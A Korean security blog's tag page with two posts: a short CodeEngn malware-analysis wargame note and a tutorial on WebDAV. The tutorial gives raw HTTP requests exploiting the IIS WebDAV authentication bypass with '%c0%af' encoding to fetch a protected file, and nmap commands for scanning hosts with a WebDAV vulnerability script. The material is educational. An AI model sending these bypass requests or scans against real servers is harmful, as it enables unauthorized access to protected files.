'WebDAV'에 해당되는 글 2건

  1. 2010.05.25 [ CodeEngn Malware Analysis ] level2
  2. 2009.11.14 What is WebDAV? / nmap을 이용한 WebDAV 스캔

2010.05.25 10:33 WarGame


level2는 주어진 소스를 보고 무엇을 공격하는지 알아내는 것으로

level1 과 비슷한 타입입니다






1-4 번째 줄 보고 바로 감이 오더군요

'DAV' 때문에 말이죠


DAV?

Posted by LinkC

2009.11.14 15:22 Web


  •  WebDAV?

    Web-based Distributed Authoring and Versioning
    Web 에서 분산 Authoring을 수행하기 위한 HTTP의 확장 프로토콜
    MKCOL, COPY, MOVE, LOCK, UNLOCK 등의 메소드 추가

    간단한 웹하드를 구현할 수 있고, FTP를 통하지 않고 HTTP 프로토콜을 통해
    웹상의 파일을 송수신 하고 수정, 삭제 할 수 있다


  • 취약점

'/' 를 %c0%af 로 우회

GET /  %c0%af/protected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

GET /prot%c0%afected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername


동영상 : http://vimeo.com/4750408 


  • nmap 을 이용한 WebDAV 스캔


 

$ svn co --username guest --password "" svn://svn.insecure.org/nmap/
$ cd nmap
$ ./configure
$ make
$ make install

 해서 nmap을 깐 뒤

http://nmap.org/svn/scripts/http-iis-webdav-vuln.nse 이곳에서 script를 받습니다. 

$ cd /usr/local/share/nmap/scripts

$ wget http://nmap.org/svn/scripts/http-iis-webdav-vuln.nse

 

다음으로 스캔을 시작합니다.
예로 

$ nmap -n -PN -p80 --script=http-iis-webdav-vuln 122.122.122.122

 에러가 날수도 있는데요.
data폴더에 folders.lst 파일이 없는 경우 입니다. 

아까 받은 namp 폴더에서 /nselib/data 안의 파일을 /usr/local/share/nmap/nselib/data로 복사하여 실행합니다



출처:http://boanin.tistory.com/127


 

Posted by LinkC
이전버튼 1 이전버튼

블로그 이미지
LinkC

태그목록

Tistory Cumulus Flash tag cloud by BLUEnLIVE requires Flash Player 9 or better.

공지사항

Yesterday48
Today12
Total328,654

달력

 « |  » 2019.5
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31  

최근에 받은 트랙백

글 보관함


. .